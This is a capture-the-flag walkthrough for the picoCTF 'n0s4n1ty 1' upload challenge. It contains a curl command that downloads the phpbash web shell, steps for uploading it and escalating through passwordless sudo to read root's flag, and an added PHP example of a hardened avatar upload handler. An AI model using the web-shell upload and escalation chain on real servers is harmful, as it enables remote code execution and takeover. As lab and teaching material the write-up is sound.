n0s4n1ty 1

Published: April 2, 2025
Updated: December 9, 2025

Description

The profile-picture upload endpoint accepts any file, drops it in `/uploads`, and serves it back. Upload a PHP web shell, browse to it, and use sudo to read /root/flag.txt.

Download a PHP web shell such as phpbash.php.

Upload it via the avatar form and note the returned path (e.g., uploads/phpbash.php).

curl -O https://raw.githubusercontent.com/Arrexel/phpbash/master/phpbash.php
sudo ls /root
sudo cat /root/flag.txt

Solution

  1. Step 1: Gain a shell
    After uploading phpbash.php, browse to `http://host/uploads/phpbash.php` to get a command prompt. You land inside `/var/www/html/uploads`.
  2. Step 2: Escalate with sudo
    Use standard Linux commands (`cd /`, `ls`, etc.). The web user has sudo without a password, so `sudo ls /root` reveals flag.txt and `sudo cat /root/flag.txt` prints the flag.

Flag

picoCTF{wh47_c4n_u_d0_wPHP_5f89...}

File uploads should validate the file type from its contents, not just its name, and be stored where the web server will never execute them.
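As an added example (not code from the challenge or from the picoCTF authors), here is how the avatar endpoint could be written so that the chain above fails at the upload step: the extension is checked against an allow-list, the MIME type is read from the bytes rather than from the client, the file must decode as an image, it is renamed to a random name, and it is stored outside the web root and served only through a handler that fixes the response type. The storage path `/var/lib/app/avatars` and the function names are assumptions for this illustration. The second half of the writeup depends on the web server account having passwordless sudo; that is a separate least-privilege fix (the account running PHP should have no sudo grant at all) and is not covered by this handler.

```php
<?php
// Added example, not part of the original writeup.
// Assumption (constructed): $storageDir lies outside the web root and is only
// reachable through serve_avatar(), so no URL ever maps straight to a stored file.

declare(strict_types=1);

const MAX_BYTES = 2 * 1024 * 1024; // 2 MiB cap on avatars
const ALLOWED = [ // extension => MIME type that finfo must report for the bytes
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
];

/**
 * Validate one entry from $_FILES and move it into $storageDir under a random name.
 * Returns the generated filename; throws RuntimeException on any failed check.
 */
function store_avatar(array $file, string $storageDir): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed or missing');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }

    // 1. Extension allow-list. Only the final extension counts, lower-cased, because
    //    that is what decides how the server would treat the file if it were reachable.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('Extension not allowed');
    }

    // 2. Content sniffing. $file['type'] comes from the client and is ignored;
    //    the MIME type is derived from the bytes and must match the extension.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException("Content type $mime does not match .$ext");
    }

    // 3. Structural check: the file must parse as an image of sane dimensions.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info[0] > 4096 || $info[1] > 4096) {
        throw new RuntimeException('Not a valid image');
    }

    // 4. Never reuse the client's filename. A random name removes path traversal
    //    and overwrite risks; the extension is the allow-listed one, not the original.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($storageDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0640); // readable by the app, never executable
    return $name;
}

/**
 * Serve a stored avatar by its generated name. The name pattern is enforced so
 * only files this handler created are reachable, and the Content-Type is fixed
 * from the allow-list so nothing stored here is ever interpreted as a script.
 */
function serve_avatar(string $name, string $storageDir): void
{
    if (!preg_match('/^[0-9a-f]{32}\.(png|jpe?g|gif)$/', $name)) {
        http_response_code(404);
        return;
    }
    $path = rtrim($storageDir, '/') . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    $ext = pathinfo($name, PATHINFO_EXTENSION);
    header('Content-Type: ' . ALLOWED[$ext]);
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: inline; filename="' . $name . '"');
    readfile($path);
}

// Usage in the upload endpoint (assumed storage path, outside the web root):
//   $name = store_avatar($_FILES['avatar'], '/var/lib/app/avatars');
//   ... persist $name on the user record ...
// and in the image route:
//   serve_avatar($name, '/var/lib/app/avatars');
```

With this layout a request for `/uploads/phpbash.php` has nothing to hit: the `/uploads` directory under the web root no longer exists, a `.php` name is rejected before the bytes are even inspected, and a PHP payload with a `.png` name fails the finfo and getimagesize checks. As defence in depth, the web server configuration for any directory that must stay under the web root should also disable the PHP handler there.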